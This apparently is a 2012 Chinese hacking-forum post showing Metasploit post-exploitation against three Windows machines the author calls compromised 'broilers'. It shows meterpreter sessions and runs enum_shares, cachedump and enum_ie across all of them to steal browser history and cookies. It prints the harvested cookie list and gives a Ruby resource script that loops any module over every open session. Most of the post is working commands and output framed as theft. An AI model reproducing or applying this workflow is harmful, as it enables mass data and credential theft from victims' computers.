切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
188 Metasploit :run all post[复制链接]
发表于 2012-10-3 19:59:43 | 显示全部楼层 |!read_mode!
刚才我通过DIR溢出获得了3台WINDOWS肉鸡的系统权限
  1. msf > sessions
  2. Active sessions
  3. ===============
  4. Id  Type                   Information                                      Connection
  5. --  ----                   -----------                                      ----------
  6. 2   meterpreter x86/win32  WWW-H5RID0XUR86\Administrator @ WWW-H5RID0XUR86  192.1.1.1:4444 -> 192.1.1.131:1063
  7. 3   meterpreter x86/win32  DIS9TEAM-B39270\Administrator @ DIS9TEAM-B39270  192.1.1.1:4444 -> 192.1.1.130:1159
  8. 4   meterpreter x86/win32  DIS9TEAM-4BBAD8\Administrator @ DIS9TEAM-4BBAD8  192.1.1.1:4444 -> 192.1.1.132:1659
  9. msf >
复制代码

现在我要获得这三台肉鸡的共享情况,来用mubix同学写的脚本吧
  1. msf > use post/windows/gather/enum_shares
  2. msf  post(enum_shares) > resource /tmp/all.rc
  3. [*] Processing /tmp/all.rc for ERB directives.
  4. [*] resource (/tmp/all.rc)> Ruby Code (185 bytes)
  5. SESSION => 2
  6. [*] Running post/windows/gather/enum_shares against session 2
  7. [*] Running against session 2
  8. [*] No shares were found
  9. [*] Post module execution completed
  10. SESSION => 3
  11. [*] Running post/windows/gather/enum_shares against session 3
  12. [*] Running against session 3
  13. [*] No shares were found
  14. [*] Post module execution completed
  15. SESSION => 4
  16. [*] Running post/windows/gather/enum_shares against session 4
  17. [*] Running against session 4
  18. [*] No shares were found
  19. [*] Post module execution completed
  20. msf  post(enum_shares) >
复制代码

恩,很草蛋的没开共享。来偷他们的IE表单吧~
  1. msf  post(enum_shares) > use post/windows/gather/cachedump
  2. msf  post(cachedump) > resource /tmp/all.rc
  3. [*] Processing /tmp/all.rc for ERB directives.
  4. [*] resource (/tmp/all.rc)> Ruby Code (185 bytes)
  5. SESSION => 2
  6. [*] Running post/windows/gather/cachedump against session 2
  7. [*] Executing module against WWW-H5RID0XUR86
  8. [-] System is not joined to a domain, exiting..
  9. [*] Post module execution completed
  10. SESSION => 3
  11. [*] Running post/windows/gather/cachedump against session 3
  12. [*] Executing module against DIS9TEAM-B39270
  13. [-] System is not joined to a domain, exiting..
  14. [*] Post module execution completed
  15. SESSION => 4
  16. [*] Running post/windows/gather/cachedump against session 4
  17. [*] Executing module against DIS9TEAM-4BBAD8
  18. [-] System is not joined to a domain, exiting..
  19. [*] Post module execution completed
  20. msf  post(cachedump) > use /post/windows/gather/enum_ie
  21. [-] Failed to load module: /post/windows/gather/enum_ie
  22. msf  post(cachedump) > use post/windows/gather/enum_ie
  23. msf  post(enum_ie) > resource /tmp/all.rc
  24. [*] Processing /tmp/all.rc for ERB directives.
  25. [*] resource (/tmp/all.rc)> Ruby Code (185 bytes)
  26. SESSION => 2
  27. [*] Running post/windows/gather/enum_ie against session 2
  28. [*] IE Version: 6.0.3790.0
  29. [-] This module will only extract credentials for >= IE7
  30. [*] Retrieving history.....
  31. File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
  32. [*] Retrieving cookies.....
  33. File: C:\Documents and Settings\Administrator\Cookies\index.dat
  34. [*] Looping through history to find autocomplete data....
  35. [-] No autocomplete entries found in registry
  36. [*] Looking in the Credential Store for HTTP Authentication Creds...
  37. [*] Writing history to loot...
  38. [*] Data saved in: /home/brk/.msf4/loot/20120112200304_default_192.1.1.131_ie.history_301779.txt
  39. [*] Post module execution completed
  40. SESSION => 3
  41. [*] Running post/windows/gather/enum_ie against session 3
  42. [*] IE Version: 6.0.2900.2180
  43. [-] This module will only extract credentials for >= IE7
  44. [*] Retrieving history.....
  45. File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
  46. [*] Retrieving cookies.....
  47. File: C:\Documents and Settings\Administrator\Cookies\index.dat
  48. [*] Looping through history to find autocomplete data....
  49. [-] No autocomplete entries found in registry
  50. [*] Looking in the Credential Store for HTTP Authentication Creds...
  51. [*] Writing history to loot...
  52. [*] Data saved in: /home/brk/.msf4/loot/20120112200318_default_192.1.1.130_ie.history_534757.txt
  53. [*] Writing cookies to loot...
  54. [*] Data saved in: /home/brk/.msf4/loot/20120112200318_default_192.1.1.130_ie.cookies_512182.txt
  55. [*] Post module execution completed
  56. SESSION => 4
  57. [*] Running post/windows/gather/enum_ie against session 4
  58. [*] IE Version: 6.0.2900.5512
  59. [-] This module will only extract credentials for >= IE7
  60. [*] Retrieving history.....
  61. File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
  62. [*] Retrieving cookies.....
  63. File: C:\Documents and Settings\Administrator\Cookies\index.dat
  64. [*] Looping through history to find autocomplete data....
  65. [-] No autocomplete entries found in registry
  66. [*] Looking in the Credential Store for HTTP Authentication Creds...
  67. [*] Writing history to loot...
  68. [*] Data saved in: /home/brk/.msf4/loot/20120112200333_default_192.1.1.132_ie.history_580511.txt
  69. [*] Writing cookies to loot...
  70. [*] Data saved in: /home/brk/.msf4/loot/20120112200333_default_192.1.1.132_ie.cookies_443815.txt
  71. [*] Post module execution completed
  72. msf  post(enum_ie) >
复制代码

恩 看一下结果:
  1. brk@Dis9Team:~/.msf4/loot$ ls
  2. 20120112200304_default_192.1.1.131_ie.history_301779.txt
  3. 20120112200318_default_192.1.1.130_ie.cookies_512182.txt
  4. 20120112200318_default_192.1.1.130_ie.history_534757.txt
  5. 20120112200333_default_192.1.1.132_ie.cookies_443815.txt
  6. 20120112200333_default_192.1.1.132_ie.history_580511.txt
  7. brk@Dis9Team:~/.msf4/loot$ cat 20120112200333_default_192.1.1.132_ie.cookies_443815.txt
  8. Cookies data
  9. ============
  10. Date Modified              Date Accessed              Url
  11. -------------              -------------              ---
  12. 2012-01-10T04:45:35+00:00  2012-01-10T04:45:35+00:00  administrator@dvd-x-player.com/
  13. 2012-01-11T16:27:31+00:00  2012-01-11T16:30:02+00:00  administrator@726.com/
  14. 2012-01-11T16:27:54+00:00  2012-01-11T16:27:54+00:00  administrator@www.xmqdh3.com/
  15. 2012-01-11T16:28:39+00:00  2012-01-11T16:31:04+00:00  administrator@adobe.com/
  16. 2012-01-11T16:29:41+00:00  2012-01-11T16:29:41+00:00  administrator@www.dqsdh.us/
  17. 2012-01-11T16:29:56+00:00  2012-01-11T16:29:56+00:00  administrator@778669.com/
  18. 2012-01-11T16:29:56+00:00  2012-01-11T16:29:56+00:00  administrator@t.jiuyaoyouxi.com/
  19. 2012-01-11T16:29:56+00:00  2012-01-11T16:29:56+00:00  administrator@u484012.778669.com/
  20. 2012-01-11T16:30:04+00:00  2012-01-11T16:30:04+00:00  administrator@www.726.com/
  21. 2012-01-11T16:30:20+00:00  2012-01-11T16:30:20+00:00  administrator@www.mzdh3.com/
  22. 2012-01-11T16:31:07+00:00  2012-01-11T16:31:07+00:00  administrator@adobe.com/cfusion/
  23. 2012-01-11T16:31:17+00:00  2012-01-11T16:31:17+00:00  administrator@zqgame.com/kz2/kzlm1/
  24. 2012-01-11T16:31:28+00:00  2012-01-12T11:50:29+00:00  administrator@google.com/
  25. 2012-01-11T16:32:43+00:00  2012-01-11T16:36:59+00:00  administrator@buffer-ad.qvod.com/
  26. 2012-01-11T16:37:05+00:00  2012-01-11T16:37:05+00:00  administrator@www.av123123.info/
  27. 2012-01-11T16:37:20+00:00  2012-01-11T16:37:20+00:00  administrator@code.7794.com/page/
  28. 2012-01-11T16:37:29+00:00  2012-01-11T16:37:29+00:00  administrator@www.977ai.com/
  29. 2012-01-11T16:38:52+00:00  2012-01-11T16:38:52+00:00  administrator@web.kuaiwan.com/
  30. 2012-01-11T16:39:06+00:00  2012-01-11T16:39:06+00:00  administrator@virtov.com/
  31. 2012-01-11T16:39:52+00:00  2012-01-12T04:29:43+00:00  administrator@scorecardresearch.com/
  32. 2012-01-11T16:39:55+00:00  2012-01-11T16:39:55+00:00  administrator@stat.youku.com/player/
  33. 2012-01-11T16:40:00+00:00  2012-01-11T16:40:00+00:00  administrator@youku.com/
  34. 2012-01-12T04:29:36+00:00  2012-01-12T04:29:36+00:00  administrator@doubleclick.net/
  35. 2012-01-12T04:30:14+00:00  2012-01-12T04:30:14+00:00  administrator@sourceforge.net/
  36. 2012-01-12T11:33:14+00:00  2012-01-12T11:50:33+00:00  administrator@google.com.hk/
  37. brk@Dis9Team:~/.msf4/loot$
复制代码

all.rc文件代码:
  1. <ruby>
  2. framework.sessions.each_key do |session|
  3. run_single("set SESSION #{session}")
  4. print_status("Running #{active_module.fullname} against session #{session}")
  5. run_single("run")
  6. sleep 1
  7. end
  8. </ruby>
复制代码




操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-28 09:25

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部